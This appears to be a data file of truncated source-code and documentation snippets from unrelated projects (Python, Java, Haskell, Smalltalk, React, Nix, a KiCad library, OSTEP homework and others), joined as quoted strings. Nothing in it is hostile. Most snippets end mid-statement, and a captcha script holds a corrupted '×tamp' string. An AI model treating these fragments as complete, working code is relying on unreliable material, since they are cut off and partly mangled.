high)\n\n def validate(self, object, name, value):\n low, high = value\n\n if low <= high:\n return value\n\n self.error(object, name, value)\n\n def create_editor(self):\n return IntervalEditor()\n\n\nclass IntervalEditorFactory(EditorFactory):\n width = Int(300)\n height = Int(40)\n\n def simple_editor(self, ui, object, name, description, parent):\n trait = object.trait(name).trait_type\n low, high = trait.value\n return IntervalEditorImpl(parent, factory=self, ui=ui,\n object=object, name=name,\n description=description,\n low=low,\n high=high)\n\nclass RangeKnobsOverlay(RangeSelectionOverlay):\n radius = Float(3)\n low_color = ColorTrait(\"red\")\n high_color = ColorTrait(\"red\")\n\n # Override the default alpha and border color, inherited from\n # RangeSelectionOverlay; these are more appropriate for our application.\n alpha = Float(0.8)" +"# Contributing\nPlease note that this project is released with a\n[Contributor Code of Conduct](https://github.com/adafruit/circuitpython/blob/master/CODE_OF_CONDUCT.md).\nBy participating in this project you agree to abide by its terms. Participation\ncovers any forum used to converse about CircuitPython including unofficial and official spaces. Failure to do\nso will result in corrective actions such as time out or ban from the project.\n\n## Developer contact\n[@thekitty](https://github.com/thekitty) is the maintainer of the CircuitPython awesome list\nand is sponsored by [Adafruit Industries LLC](https://adafruit.com). \n\n## Licensing\nBy contributing to this repository you are certifying that you have all necessary\npermissions to license the information under an CC0 License." +"\"\nI am ZnMessageBenchmark helps to test the benchmarking and profiling of ZnMessage writing and reading.\n\nInstance Variables\n\tbuffer:\t\t\t\t\t<ByteArray>\n\tmessage:\t\t\t\t<ZnObject>\n\trepresentation:\t\t<ByteArray>\n\nZnMessageBenchmark new\n\tsimpleRequest;\n\twrite: 10000.\n\nZnMessageBenchmark new\n\tsimpleRequest;\n\twriteRepresentation;\n\tread: 10000.\n\nZnMessageBenchmark new\n\tsimpleResponse;\n\twrite: 10000.\n\nZnMessageBenchmark new\n\tsimpleResponse;\n\twriteRepresentation;\n\tread: 10000.\n\n\"\nClass {\n\t#name : #ZnMessageBenchmark,\n\t#superclass : #Object,\n\t#instVars : [\n\t\t'message',\n\t\t'representation',\n\t\t'buffer'\n\t],\n\t#category : #'Zinc-Tests'\n}\n\n{ #category : #accessing }\nZnMessageBenchmark class >> bench: messages [\n\t| results |\n\tresults := Dictionary new.\n\tmessages \n\t\tdo: [ :each | | bench report |\n\t\t\tbench := self new.\n\t\t\tbench perform: each.\n\t\t\tbench writeRepresentation.\n\t\t\treport := 'Writing {1} - Reading {2}' format: { bench benchWrite. bench benchRead }.\n\t\t\tresults at: each put: report ] \n\t\tdisplayingProgress: 'Benchmarking...'.\n\t^ results\n]\n\n{ #category : #accessing }\nZnMessageBenchmark class >> benchAll [\n\t^ self bench: self messages\n]\n\n{ #category : #accessing }\nZnMessageBenchmark class >> messages [\n\t^ self requests , self responses\n]\n\n{ #category : #accessing }\nZnMessageBenchmark class >> requests [\n\t^ #( simpleRequest standardRequest postRequest )\n]\n\n{ #category : #accessing }\nZnMessageBenchmark class >> responses [\n\t^ #( \n\t\tsimpleResponse \n\t\ttextResponse8k textResponse64k textResponse256k\n\t\ttextResponseWide8k textResponseWide64k textResponseWide256k\n\t\tasciiResponse8k asciiResponse64k asciiResponse256k\n\t\tbinaryResponse8k" +"package org.wicketstuff.openlayers3.api.format;\n\nimport java.io.Serializable;\n\n/**\n * Provides an object that models a GeoJSON format for providing feature data.\n */\npublic class GeoJsonFormat extends FeatureFormat implements Serializable {\n\n /**\n * The default projection for this format.\n */\n private String defaultProjection;\n\n /**\n * The geometry name to use when creating features.\n */\n private String geometryName;\n\n /**\n * Creates a new instance.\n */\n public GeoJsonFormat() {\n this(null, null);\n }\n\n /**\n * Creates a new instance.\n *\n * @param defaultProjection\n * Default projection for this format\n * @param geometryName\n * The name to use when creating features\n */\n public GeoJsonFormat(final String defaultProjection, final String geometryName) {\n super();\n\n this.defaultProjection = defaultProjection;\n this.geometryName = geometryName;\n }\n\n /**\n * Returns the default projection.\n *\n * @return String with the projection\n */\n public String getDefaultProjection() {\n return defaultProjection;\n }\n\n /**\n * Sets the default projection.\n *\n * @param defaultProjection\n * New value\n */\n public void setDefaultProjection(String defaultProjection) {\n this.defaultProjection = defaultProjection;\n }\n\n /**\n * Sets the default projection.\n *\n * @param defaultProjection\n * New value\n * @return This instance\n */\n public GeoJsonFormat defaultProjection(String defaultProjection) {\n this.defaultProjection = defaultProjection;\n return this;\n }\n\n /**\n * Returns the geometry name.\n */\n public String getGeometryName() {\n return geometryName;\n }\n\n /**\n * Sets" +"package org.mockserver.model;\n\n/**\n * @author jamesdbloom\n */\npublic class ConnectionOptions extends ObjectWithJsonToString {\n\n private Boolean suppressContentLengthHeader = null;\n private Integer contentLengthHeaderOverride = null;\n private Boolean suppressConnectionHeader = null;\n private Integer chunkSize = null;\n private Boolean keepAliveOverride = null;\n private Boolean closeSocket = null;\n private Delay closeSocketDelay = null;\n\n public static ConnectionOptions connectionOptions() {\n return new ConnectionOptions();\n }\n\n /**\n * Prevent a \"Content-Length\" header from being added to the response\n *\n * @param suppressContentLengthHeader if true no \"Content-Length\" header will be added to the response\n */\n public ConnectionOptions withSuppressContentLengthHeader(Boolean suppressContentLengthHeader) {\n this.suppressContentLengthHeader = suppressContentLengthHeader;\n return this;\n }\n\n public Boolean getSuppressContentLengthHeader() {\n return suppressContentLengthHeader;\n }\n\n /**\n * Override the \"Content-Length\" header with the specified amount, if not set the \"Content-Length\"\n * header will have a value determined by the length of the body\n *\n * @param contentLengthHeaderOverride the value to use for the \"Content-Length\" header\n */\n public ConnectionOptions withContentLengthHeaderOverride(Integer contentLengthHeaderOverride) {\n this.contentLengthHeaderOverride = contentLengthHeaderOverride;\n return this;\n }\n\n public Integer getContentLengthHeaderOverride() {\n return contentLengthHeaderOverride;\n }\n\n /**\n * Prevent a \"Connection\" header from being added to the response\n *\n * @param suppressConnectionHeader if true no \"Connection\" header will be added to the response\n */\n public ConnectionOptions withSuppressConnectionHeader(Boolean suppressConnectionHeader) {\n this.suppressConnectionHeader = suppressConnectionHeader;\n return this;" +"# Calls without locks ... add a caller -> callee line in\n# this file when ...\n# - every call from caller to callee is done outside a PM_LOCK-PM_UNLOCK\n# block in the caller file\n#\n# Do not add an entry if the callee only locks __pmLock_extcall (this is\n# the lowest lock in the hierarchy, so it does not matter what locks are\n# held when __pmLock_extcall is locked as this cannot cause lock inversion\n# or deadlock\n#\n# Note, we are not concerned about any locks that may be held on entry\n# to the caller routine, this is just about locking in the caller and\n# calls to the callee. By adding an entry in this file we are asserting\n# that calls from caller to callee cannot be contributing to any lock\n# inversion problems or violation of the documented lock hierarchy in\n# libpcp.\n#\n# Lines in this file starting with # are treated as comments.\n#\n# Blank lines in this file are ignored\n#\n\n# util.c\npmflush -> pmGetOptionalConfig\nvpmprintf -> pmGetOptionalConfig\n__pmOpenLog -> logreopen\n__pmOpenLog -> logheader\n__pmRotateLog -> logreopen\n__pmRotateLog -> logheader\n__pmOpenLog -> __pmNoMem\n\n# config.c" +"{-# LANGUAGE Trustworthy #-}\n{-# LANGUAGE CPP, NoImplicitPrelude, NondecreasingIndentation,\n RecordWildCards, ScopedTypeVariables #-}\n{-# OPTIONS_GHC -fno-warn-name-shadowing #-}\n\nmodule GHC.IO.Encoding.CodePage.API (\n mkCodePageEncoding\n ) where\n\nimport Foreign.C\nimport Foreign.Ptr\nimport Foreign.Marshal\nimport Foreign.Storable\nimport Data.Bits\nimport Data.Either\nimport Data.Word\n\nimport GHC.Base\nimport GHC.List\nimport GHC.IO.Buffer\nimport GHC.IO.Encoding.Failure\nimport GHC.IO.Encoding.Types\nimport GHC.IO.Encoding.UTF16\nimport GHC.Num\nimport GHC.Show\nimport GHC.Real\nimport GHC.Windows\nimport GHC.ForeignPtr (castForeignPtr)\n\nimport System.Posix.Internals\n\n\nc_DEBUG_DUMP :: Bool\nc_DEBUG_DUMP = False\n\ndebugIO :: String -> IO ()\ndebugIO s\n | c_DEBUG_DUMP = puts s\n | otherwise = return ()\n\n\n#if defined(i386_HOST_ARCH)\n# define WINDOWS_CCONV stdcall\n#elif defined(x86_64_HOST_ARCH)\n# define WINDOWS_CCONV ccall\n#else\n# error Unknown mingw32 arch\n#endif\n\n\ntype LPCSTR = Ptr Word8\n\n\nmAX_DEFAULTCHAR :: Int\nmAX_DEFAULTCHAR = 2\n\nmAX_LEADBYTES :: Int\nmAX_LEADBYTES = 12\n\n-- Don't really care about the contents of this, but we have to make sure the size is right\ndata CPINFO = CPINFO {\n maxCharSize :: UINT,\n defaultChar :: [BYTE], -- ^ Always of length mAX_DEFAULTCHAR\n leadByte :: [BYTE] -- ^ Always of length mAX_LEADBYTES\n }\n\ninstance Storable CPINFO where\n sizeOf _ = sizeOf (undefined :: UINT) + (mAX_DEFAULTCHAR + mAX_LEADBYTES) * sizeOf (undefined :: BYTE)\n alignment _ = alignment (undefined :: CInt)\n peek ptr = do\n ptr <-" +"EESchema-LIBRARY Version 2.3\n#encoding utf-8\n#\n# REE-0505S\n#\nDEF REE-0505S U 0 40 Y Y 1 F N\nF0 \"U\" 0 350 50 H V C CNN\nF1 \"REE-0505S\" 0 250 50 H V C CNN\nF2 \"manuf:RECOM-REE-0505S\" -100 250 60 H I C CNN\nF3 \"\" 0 0 60 H V C CNN\n$FPLIST\n RECOM-REE-0505S\n$ENDFPLIST\nDRAW\nS -350 200 350 -200 0 1 10 f\nS -50 200 50 -200 0 1 0 F\nX +IN 1 -550 100 200 R 50 50 1 1 W\nX -IN 2 -550 -100 200 R 50 50 1 1 W\nX -OUT 4 550 -100 200 L 50 50 1 1 W\nX +OUT 6 550 100 200 L 50 50 1 1 w\nENDDRAW\nENDDEF\n#\n#End Library" +"import React from 'react';\nimport { Link } from '@reach/router';\nimport { PlayerContext } from '../PlayerProvider';\nimport { Spinner } from '../Spinner';\nimport IconPause from '../Icon/IconPause';\nimport IconPlay from '../Icon/IconPlay';\nimport { IconSuspensify } from '../Icon/IconSuspensify';\nimport { Match } from '@reach/router';\n\nfunction Nav(props) {\n return (\n <div>\n <Match path=\"/artist/:id\">\n {props =>\n props.match ? (\n <div\n className=\"nav row\"\n style={{ justifyContent: 'space-between', zIndex: 9999 }}\n >\n <Link to=\"/\" className=\"logo\">\n <IconSuspensify style />\n </Link>{' '}\n <PlayerContext.Consumer>\n {({\n currentTrack,\n play,\n pause,\n isPlaying,\n isLoading,\n }) => {\n return currentTrack ? (\n <div\n className=\"row\"\n role=\"button\"\n onClick={\n isPlaying\n ? pause(currentTrack)\n : play(currentTrack)\n }\n >\n {isPlaying ? (\n isLoading ? (\n <Spinner className=\"small\" />\n ) : (\n <IconPause height=\"16\" width=\"16\" />\n )\n ) : (\n <IconPlay height=\"16\" width=\"16\" />\n )}\n <div\n style={{\n marginLeft: 8,\n fontSize: 12,\n lineHeight: 1,\n }}\n >\n {currentTrack.name}\n </div>\n </div>\n ) : (\n <div />\n );\n }}\n </PlayerContext.Consumer>\n </div>\n ) : null\n }\n </Match>\n <div className=\"main\">{props.children}</div>\n </div>\n );\n}\n\nexport default Nav;" +"(function() {\n\n var LOAD_TIMEOUT = 60000;\n\n // Skip tutorial.\n window.localStorage.pt_user_id = '5e5c5e7d874ffaaa';\n window.localStorage.ptpgame_mute = '0';\n window.localStorage.ptpgame_tutorial='3';\n\n var gameOver = false;\n\n window.muniverse = {\n init: function() {\n return pollAndWait(LOAD_TIMEOUT, function() {\n return window.globalGameObj &&\n globalGameObj.state &&\n globalGameObj.state.current === 'MainMenu';\n }).then(function() {\n // Skip menu fade in.\n window.faketime.pause();\n window.faketime.advance(4000);\n\n globalGameObj.state.states.GameMain.gameOver = () => gameOver = true;\n\n // Get into the game and skip animations.\n globalGameObj.stage.children[0].children[5].events.onInputDown.dispatch();\n window.faketime.advance(3000);\n\n // Remove pause button.\n for (var i = 0; i < 10; i++) {\n if (globalGameObj.stage.children[0].children[9].onInputDown) {\n break;\n }\n window.faketime.advance(100);\n }\n if (!globalGameObj.stage.children[0].children[9].onInputDown) {\n throw 'Pause button was not setup.';\n }\n globalGameObj.stage.children[0].children[9].visible = false;\n });\n },\n step: function(millis) {\n window.faketime.advance(millis);\n return Promise.resolve(gameOver);\n },\n score: function() {\n var text = globalGameObj.state.callbackContext.scoreText._text;\n return Promise.resolve(parseInt(text) || 0);\n }\n };\n\n})();" +"\ufeffusing System;\nusing EcsRx.Components.Database;\nusing EcsRx.Components.Lookups;\nusing EcsRx.Pools;\n\nnamespace EcsRx.Entities\n{\n public class DefaultEntityFactory : IEntityFactory\n {\n public IIdPool IdPool { get; }\n public IComponentDatabase ComponentDatabase { get; }\n public IComponentTypeLookup ComponentTypeLookup { get; }\n\n public DefaultEntityFactory(IIdPool idPool, IComponentDatabase componentDatabase, IComponentTypeLookup componentTypeLookup)\n {\n IdPool = idPool;\n ComponentDatabase = componentDatabase;\n ComponentTypeLookup = componentTypeLookup;\n }\n\n public int GetId(int? id = null)\n {\n if(!id.HasValue)\n { return IdPool.AllocateInstance(); }\n\n IdPool.AllocateSpecificId(id.Value);\n return id.Value;\n }\n \n public IEntity Create(int? id = null)\n {\n if(id.HasValue && id.Value == 0)\n { throw new ArgumentException(\"id must be null or > 0\"); }\n \n var usedId = GetId(id);\n return new Entity(usedId, ComponentDatabase, ComponentTypeLookup);\n }\n\n public void Destroy(int entityId)\n { IdPool.ReleaseInstance(entityId); }\n }\n}" +"function [pos, tri] = mesh_sphere(n, method)\n\n% MESH_SPHERE creates spherical mesh, with approximately nvertices vertices\n%\n% Use as\n% [pos, tri] = mesh_sphere(numvertices, method)\n%\n% The input parameter 'n' specifies the (approximate) number of vertices.\n% Once log4((n-2)/10) is an integer, the mesh will be based on an icosahedron.\n% Once log4((n-2)/4) is an integer, the mesh will be based on a refined octahedron.\n% Once log4((n-2)/2) is an integer, the mesh will be based on a refined tetrahedron.\n% Otherwise, an msphere will be used. If n is empty, or undefined, a 12 vertex\n% icosahedron will be returned.\n%\n% The input parameter 'method' defines which function to use when an refined\n% icosahedron, octahedron or tetrahedron is not possible, and can be 'msphere'\n% (default), or 'ksphere'.\n%\n% See also MESH_TETRAHEDRON, MESH_OCTAHEDRON, MESH_ICOSAHEDRON\n\n% Copyright (C) 2002, Robert Oostenveld\n% Copyright (C) 2019, Robert Oostenveld and Jan-Mathijs Schoffelen\n%\n% This file is part of FieldTrip, see http://www.fieldtriptoolbox.org\n% for the documentation and details.\n%\n% FieldTrip is free software: you can redistribute it and/or modify\n% it under the terms of the GNU General Public License as published by\n% the Free Software" +".TH qthread_feb_barrier 3 \"APRIL 2011\" libqthread \"libqthread\"\n.SH NAME\n.BR qthread_feb_barrier_create ,\n.BR qthread_feb_barrier_enter ,\n.BR qthread_feb_barrier_destroy ,\n.B qthread_feb_barrier_resize\n\\- manipulates FEB-based barriers\n.SH SYNOPSIS\n.B #include <qthread/feb_barrier.h>\n\n.I qt_feb_barrier_t *\n.br\n.B qthread_feb_barrier_create\n.RI \"(size_t \" max_threads );\n.PP\n.I void\n.br\n.B qthread_feb_barrier_enter\n.RI \"(qt_feb_barrier_t *\" b );\n.PP\n.I void\n.br\n.B qthread_feb_barrier_resize\n.RI \"(size_t\" new_max_threads );\n.PP\n.I void\n.br\n.B qthread_feb_barrier_destroy\n.RI \"(qt_feb_barrier_t *\" b );\n.SH DESCRIPTION\nThese are the functions for manipulating simplistic FEB-based barriers.\n.PP\nThe\n.BR qthread_feb_barrier_create ()\nfunction generates a barrier data structure, which can then be used to wait for\n.I max_threads\nthreads to enter the barrier. To enter the barrier, each thread must call\n.BR qthread_feb_barrier_enter (),\nwhich will cause the thread to block until the specified number of threads has entered the same barrier. Once the barrier is no longer needed, it can be deallocated with the\n.BR qthread_feb_barrier_destroy ()\nfunction. Instead of destroying and creating a new barrier, barriers may be resized if necessary, using the\n.BR qthread_feb_barrier_resize ()\nfunction. The barrier must be empty before resizing." +"#include \"9cc.h\"\n\n// This is a recursive-descendent parser which constructs abstract\n// syntax tree from input tokens.\n//\n// Variable names are resolved at this stage. We create a Var object\n// when we see a variable definition and use it when we see a variable\n// reference.\n//\n// Types are added to variables and literals. For other nodes, Sema\n// will add type for them.\n//\n// Semantic checking is omitted from this parser to make the code in\n// this file closely resemble the C's BNF. Invalid expressions, such\n// as `1+2=3`, are accepted at this stage. Such errors are detected in\n// a later pass.\n\nint nlabel = 1;\n\ntypedef struct Env {\n Map *vars;\n Map *typedefs;\n Map *tags;\n struct Env *prev;\n} Env;\n\nstatic Program *prog;\nstatic Vector *lvars;\nstatic Vector *breaks;\nstatic Vector *continues;\nstatic Vector *switches;\n\nstatic Vector *tokens;\nstatic int pos;\nstruct Env *env;\n\nstatic Node null_stmt = {ND_NULL};\n\nstatic Env *new_env(Env *prev) {\n Env *env = calloc(1, sizeof(Env));\n env->vars = new_map();\n env->typedefs = new_map();\n env->tags = new_map();\n env->prev = prev;\n return env;\n}\n\nstatic Var *find_var(char *name) {\n for (Env *e = env; e; e = e->prev) {\n Var *var =" +"<!--[meta]\nsection: misc\ntitle: Alert\n[meta]-->\n\nimport { Alert } from './src';\n\n# Arch Alert\n\n#### TODO\n\n- npm version\n- build status\n\n> Alert messages, or alerts, inform users of successful or pending actions. Use them sparingly. Don\u2019t show more than one at a time.\n\nThis repository is a module of the full [arch-ui][source] repository.\n\n## Install\n\nThis repository is distributed with [npm][npm]. After [installing npm][install-npm], you can install `@arch-ui/alert` with this command.\n\n```\nnpm install --save @arch-ui/alert\n\n# OR\n\nyarn add @arch-ui/alert\n```\n\n## Usage\n\nImport the component into your application.\n\n```jsx\nimport { Alert } from '@arch-ui/alert';\n```\n\nTo override the styles use the [`@arch-ui/theme` package][theme].\n\n## Documentation\n\n<!-- %docs -->\n\nAlert messages, or alerts, inform users of successful or pending actions. Use them sparingly. Don't show more than one at a time.\n\n## Default\n\nAlert messages start off looking decently neutral\u2014they're just light blue rounded rectangles.\n\n```jsx\n<Alert>Alert message goes here.</Alert>\n```\n\n<Alert>Alert message goes here.</Alert>\n\nYou can put multiple paragraphs of text in an alert\u2014the last paragraph's bottom `margin` will be automatically override.\n\n```jsx\n<Alert>\n <p>\n This is a longer alert in its own paragraph. It ends up looking something like this. If we keep" +"========\nFeatures\n========\n\n- :doc:`Document versioning <../chapters/versioning>`.\n\n - Store many versions of the same document, download or revert to a\n previous version.\n\n- :doc:`Digital signatures <../chapters/signatures>`.\n\n - Check the authenticity of documents by verifying their embedded\n cryptographic signatures or upload detached signatures for document\n signed after they were stored.\n\n- :doc:`Collaboration tools <../parts/collaboration>`.\n\n - Discuss documents, or comment on new versions of a document.\n\n- :doc:`User-defined document metadata <../chapters/metadata>`.\n\n - Several metadata fields can be matched to a document type as per technical,\n legal or structural requirements such as the `Dublin core`_.\n - Metadata fields can have an initial value, which can be static or determined\n by a template code snippet provided by the user.\n\n- :doc:`Documents can be uploaded from different sources <../chapters/sources>`.\n\n - Local file or server side file uploads, multifunctional copier, or even via\n email.\n\n- Batch uploads.\n\n - Many documents can be upload in a single action.\n - Clone a document's metadata for speedier uploads and eliminate repetitive\n data entry.\n\n- Previews for many file formats.\n\n - Mayan EDMS provides image preview generation for many popular file\n formats.\n\n- Office document format support.\n\n - Mayan EDMS can detect the presence of Libre Office and use it" +"final: prev:\nlet\n callCabal2Nix = compiler-nix-name: name: src: final.evalPackages.stdenv.mkDerivation {\n name = \"${name}-package.nix\";\n inherit src;\n nativeBuildInputs = [\n # It is not safe to check the nix-tools materialization here\n # as we would need to run this code to do so leading to\n # infinite recursion (so using nix-tools-unchecked).\n final.evalPackages.haskell-nix.nix-tools-unchecked.${compiler-nix-name}\n ];\n phases = [ \"unpackPhase\" \"buildPhase\" ];\n\n LOCALE_ARCHIVE = final.lib.optionalString (final.stdenv.hostPlatform.libc == \"glibc\") \"${final.glibcLocales}/lib/locale/locale-archive\";\n LANG = \"en_US.UTF-8\";\n LC_ALL = \"en_US.UTF-8\";\n\n buildPhase = ''\n cabal-to-nix *.cabal > $out\n '';\n };\n\n # Combines multiple derivations into one to make them\n # easier to materialize.\n # Using `cp -Lr` here follows the symlinks and prevents\n # `access to path is forbidden in restricted mode`\n # errors on hydra when the materialized files are not present.\n combineFiles = name: ext: files:\n let links = final.linkFarm name\n (final.lib.mapAttrsToList (name: path: {\n name = name + ext;\n inherit path;\n }) files);\n in final.evalPackages.runCommand \"${name}${ext}\" {} ''\n cp -Lr ${links} $out\n chmod -R +w $out\n '';\n\n # Combine the all the boot package nix files for a given ghc\n # into a single derivation and materialize it.\n combineAndMaterialize = ghcName: bootPackages:\n let\n # Not all the boot packages for ghc 8.8 and above can be\n # processed" +"---\nauthor: catalin\ntype: normal\ncategory: how to\nlinks:\n - >-\n [Default prop\n values](https://facebook.github.io/react/docs/typechecking-with-proptypes.html#default-prop-values){website}\nparent: validate-for-required-props\n---\n\n# Default values for props\n\n\n---\n\n## Content\n\n**React** provides a way of defining *default* values for props. This allows the safe usage of props even though they are not specified by the parent component.\n\nThe value assignment is done via the `defaultProps` special property of your component:\n\n```jsx\nfunction MyComponent(props) {\n return <p>{props.text}</p>;\n}\n\nMyComponent.defaultProps = {\n text: \"Bonjour le monde!\"\n};\n```\n\nHere, the default value for the `text` prop is `\"Bonjour le monde!\"`.\n\nAs a consequence, `this.props.text` will have a value even if it's not specified by the parent component.\n\n\n---\n\n## Practice\n\nFill the missing that such that the default values for the `value` prop is `\"xyz\"`:\n\n```jsx\nfunction Comp(props) {\n return <h2>{props.value}</h2>;\n}\n\nComp.??? = {\n ???: ???,\n};\n```\n\n- `defaultProps`\n- `value`\n- `\"xyz\"`\n- `default`\n- `getDefaultProps`\n\n\n---\n\n## Revision\n\nFill the missing that such that the default values for the `value` prop is `\"xyz\"`:\n\n```jsx\nfunction Comp(props) {\n return <h2>{props.value}</h2>;\n}\n\nComp.??? = {\n ???: ???,\n};\n```\n\n- `defaultProps`\n- `value`\n- `\"xyz\"`\n- `default`\n- `getDefaultProps`" +"---\ntitle: Production Installation\naliases:\n - /enterprise/v1.1/production_installation/\nmenu:\n enterprise_influxdb_1_1:\n weight: 2\n identifier: production_installation\n---\n\nThe Production Installation process is designed for users looking to deploy\nInfluxEnterprise in a production environment.\n\nIf you wish to evaluate InfluxEnterprise in a non-production\nenvironment, feel free to follow the instructions outlined in the\n[QuickStart Installation](/enterprise_influxdb/v1.1/quickstart_installation) section.\nPlease note that if you install InfluxEnterprise with the QuickStart Installation process you\nwill need to reinstall InfluxEnterprise with the Production Installation\nprocess before using the product in a production environment.\n\n\n## Production Installation\n\nFollow the links below to get up and running with InfluxEnterprise.\n\n### [Step 1 - Meta Node Installation](/enterprise_influxdb/v1.1/production_installation/meta_node_installation/)\n### [Step 2 - Data Node Installation](/enterprise_influxdb/v1.1/production_installation/data_node_installation/)\n### [Step 3 - Web Console Installation](/enterprise_influxdb/v1.1/production_installation/web_console_installation/)" +"# The comprehensions here shouldn't get collapsed to single lines.\n\nGLOB_resources_legacy_txt = glob([\"resources/legacy/*.txt\"])\n\nGLOB_resources_legacy_txt2 = [\n filename_and_some_extra_to_make_this_long\n for filename_and_some_extra_to_make_this_long in GLOB_resources_legacy_txt\n]\n\nlegacy_txt_name_to_filename = {\n filename.split(\"/\")[-1][:-len(\".txt\")].lower(): filename\n for filename in GLOB_resources_legacy_txt_tuple\n}\n\nflags = [\n flag\n for flag in [\n _flag(\n name,\n type(default),\n values.pop(name, default),\n )\n for name, default in defaults.items()\n ]\n if flag != None\n]\n\nflags = [\n flag # Example comment.\n for flag in [\n _flag(\n name,\n type(default),\n values.pop(name, default),\n )\n for name, default in defaults.items()\n ] # Clarififcation.\n if flag != None\n] # Skip empty elements.\n\nflags = [\n # Example comment.\n flag\n # Clarififcation.\n for flag in [\n _flag(\n name,\n type(default),\n values.pop(name, default),\n )\n for name, default in defaults.items()\n ]\n # Skip empty elements.\n if flag != None\n]\n\nflags = [\n\n # Example comment.\n flag\n\n # Clarififcation.\n for flag in [\n _flag(\n name,\n type(default),\n values.pop(name, default),\n )\n for name, default in defaults.items()\n ]\n\n # Skip empty elements.\n if flag != None\n]" +"import Foundation\n\n/// [Internal] Generic Mock library errors\n///\n/// - notStubed: Calling method on mock, for which return value was not yet stubbed. DO NOT USE it as stub throw value!\npublic enum MockError: Error {\n case notStubed\n}\n\n/// [Internal] Possible Given products. Method can either return or throw an error (in general)\n///\n/// - `return`: Return value\n/// - `throw`: Thrown error value\npublic enum StubProduct {\n case `return`(Any)\n case `throw`(Error)\n\n /// [Internal] If self is returns, and nested value can be casted to T, returns value. Can fail (fatalError)\n ///\n /// - Returns: Value if self is return\n /// - Throws: Error if self is throw\n public func casted<T>() throws -> T {\n switch self {\n case let .throw(error): throw error\n case let .return(value): return (value as? T).orFail(\"Casting to \\(T.self) failed\")\n }\n }\n}\n\n/// [Internal] Allows to reduce Mock.generated.swif size, by moving part of implementation here.\nopen class StubbedMethod: WithStubbingPolicy {\n /// [Internal] Returns whether there are still products to be used as stub return values\n public var isValid: Bool { return index < products.count }\n /// [Internal] Stubbing policy. By default uses parent mock policy\n public var policy: StubbingPolicy = .default\n /// [Internal]" +"# Sun\u2019s Network File System (NFS)\n\n## Homework (Measurement)\n\nIn this homework, you\u2019ll do a little bit of NFS trace analysis using real traces. The source of these traces is Ellard and Seltzer\u2019s effort [ES03]. Make sure to read the related README and download the relevant tarball from the OSTEP homework page (as usual) before starting.\n\n### Questions\n\n1. A first question for your trace analysis: using the timestamps found in the first column, determine the period of time the traces were taken from. How long is the period? What day/week/month/year was it? (does this match the hint given in the filename?) Hint: Use the tools `head -1` and `tail -1` to extract the first and last lines of the file, and do the calculation.\n\n [`strftime()`](https://www.gnu.org/software/gawk/manual/html_node/Time-Functions.html) is `gawk` extension, it's not specified in the POSIX standard. The filename is `anon-deasna-021016-1300.txt`, that's the same date.\n\n ```\n $ awk -f q1.awk anon-deasna-021016-1300.txt\n Period: 59.98 minutes\n Start time: 16 10 2002\n ```\n\n2. Now, let\u2019s do some operation counts. How many of each type of operation occur in the trace? Sort these by frequency; which operation is most frequent? Does NFS live up to its reputation?\n\n ```\n $ awk '{ a[$8]++} END {for" +"//\u70b9\u51fb\u6362\u4e00\u5f20\u9a8c\u8bc1\u7801\nfunction changeImg() {\n\tvar imgSrc = $(\"#imgObj\"); \n var src = imgSrc.attr(\"src\"); \n imgSrc.attr(\"src\",chgUrl(src)); \n $(\"#info\").html(\"\");\n}\n//\u65f6\u95f4\u6233 \n//\u4e3a\u4e86\u4f7f\u6bcf\u6b21\u751f\u6210\u56fe\u7247\u4e0d\u4e00\u81f4\uff0c\u5373\u4e0d\u8ba9\u6d4f\u89c8\u5668\u8bfb\u7f13\u5b58\uff0c\u6240\u4ee5\u9700\u8981\u52a0\u4e0a\u65f6\u95f4\u6233 \nfunction chgUrl(url) {\n\tvar timestamp = (new Date()).valueOf();\n\tvar dex=url.indexOf(\"drawImage\")+\"drawImage\".length;\n url = url.substring(0, dex);\n\tif ((url.indexOf(\"&\") >= 0)) {\n\t\turl = url + \"\u00d7tamp=\" + timestamp; \n\t} else {\n\t\turl = url + \"?timestamp=\" + timestamp; \n\t}\n\treturn url;\n}\n//\u9a8c\u8bc1\u7801\u9a8c\u8bc1\nfunction isRightCode() {\n\tvar code = $(\"#veryCode\").attr(\"value\");\n\t//alert(code);\n\tcode = \"c=\" + code;\n\t$.ajax( {\n\t\ttype : \"POST\",\n\t\turl : \"ResultServlet\",\n\t\tdata : code,\n\t\tsuccess : callback\n\t});\n}\n//\u9a8c\u8bc1\u4ee5\u540e\u5904\u7406\u63d0\u4ea4\u4fe1\u606f\u6216\u9519\u8bef\u4fe1\u606f\nfunction callback(data) {\n\tif(data.toString()==1)\n\t{\n\t\t$(\"#info\").html(\"xw\u7d20\u6750\u7f51\u63d0\u9192\u60a8\uff1a\u6210\u529f\u4e86\uff01\");\n\t return;\n\t}else\n\t{\n\t\t$(\"#info\").html(data);\n\t\treturn;\n\t}\n}" +"{% extends \"data_wizard/base_site.html\" %}\n\n{% block content %}\n<h2>Data Format</h2>\n{% if serializer %}\n<ul class=\"messagelist\">\n <li>\n This dataset will be parsed as \"{{serializer_label}}\".\n </li>\n</ul>\n{% include \"data_wizard/continue.html\" %}\n{% elif not serializer_choices %}\n<ul class=\"messagelist\">\n <li class=\"error\">No serializers registered.</li>\n</ul>\n<p>See <a href=\"https://github.com/wq/django-data-wizard#model-registration\">https://github.com/wq/django-data-wizard#model-registration</a> for more information.\n{% else %}\n<ul class=\"messagelist\">\n <li class=\"warning\">Select a format (serializer) to continue.</li>\n</ul>\n<form action=\"{% url 'data_wizard:run-updateserializer' pk=id %}\" method=\"post\">\n {% csrf_token %}\n <fieldset data-role=\"controlgroup\">\n <legend>Select Format</legend>\n <ul class=\"radiolist\">\n {% for choice in serializer_choices %}\n <li>\n <label for=\"serializer-{{choice.name}}\">\n <input type=\"radio\" name=\"serializer\" id=\"serializer-{{choice.name}}\"\n value=\"{{choice.name}}\">\n {{choice.label}}\n </label>\n {% endfor %}\n </li>\n </ul>\n </fieldset>\n</ul>\n<div class=\"submit-row\">\n <input type=\"submit\" value=\"Save Selection\">\n</div>\n</form>\n{% endif %}\n{% endblock %}" +"import {Actions} from '../Actions'\nimport {Action} from 'redux'\nimport {Configuration} from '../configuration/Configuration'\n\nexport enum BackupLocation {\n GITHUB = 'github',\n GITLAB = 'gitlab'\n}\n\nexport interface ActionConfigurationImported extends Action<Actions.CONFIGURATION_IMPORTED> {\n readonly configuration: Configuration;\n}\n\nexport interface ActionBackupSetId extends Action<Actions.BACKUP_SET_ID> {\n readonly location: BackupLocation;\n readonly id: string;\n}\n\nexport interface ActionBackupSetDescription extends Action<Actions.BACKUP_SET_DESCRIPTION> {\n readonly location: BackupLocation;\n readonly description: string;\n}\n\nexport interface ActionBackupSetUrl extends 